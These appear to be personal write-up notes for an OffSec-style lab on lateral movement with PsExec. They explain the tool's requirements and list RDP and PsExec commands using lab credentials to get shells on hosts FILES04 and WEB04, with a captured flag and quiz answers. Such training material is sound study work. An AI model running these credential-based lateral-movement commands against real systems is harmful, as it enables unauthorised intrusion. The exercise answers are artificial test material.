Topics: PsExec
# Questions 1
Start VM Group 1 and repeat the steps discussed in this section. Which system folder (that will become a share name) needs to be shared in order for PsExec to connect remotely?
# Answer
ADMIN$

# PsExec is a very versatile tool that is part of the SysInternals suite developed by Mark Russinovich. It's intended to replace telnet-like applications and provide remote execution of processes on other systems through an interactive console.

# It is possible to misuse this tool for lateral movement, but three requisites must be met. First, the user that authenticates to the target machine needs to be part of the Administrators local group. Second, the ADMIN$ share must be available, and third, File and Printer Sharing has to be turned on.

# To execute the command remotely, PsExec performs the following tasks:
- Writes psexesvc.exe into the C:\Windows directory
- Creates and spawns a service on the remote host
- Runs the requested program/command as a child process of psexesvc.exe

xfreerdp /u:offsec /p:lab /v:192.168.195.74

# Open powershell
PS C:\Tools\SysinternalsSuite> ./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

C:\Windows\system32>hostname
FILES04
C:\Windows\system32>whoami
corp\jen

# Questions 2
Start VM Group 2 and connect as the offsec user on client74. Then try to use PsExec to move laterally to web04 in order to get the flag located on jen's desktop.
# Answer
OS{b8ddb3c04d86488995ffafd0c049e68b}

xfreerdp /u:offsec /p:lab /v:192.168.195.74
# Open powershell
PS C:\Tools\SysinternalsSuite> ./PsExec64.exe -i  \\WEB04 -u corp\jen -p Nexus123! cmd

C:\Users\jen\Desktop>type flag.txt
OS{b8ddb3c04d86488995ffafd0c049e68b}

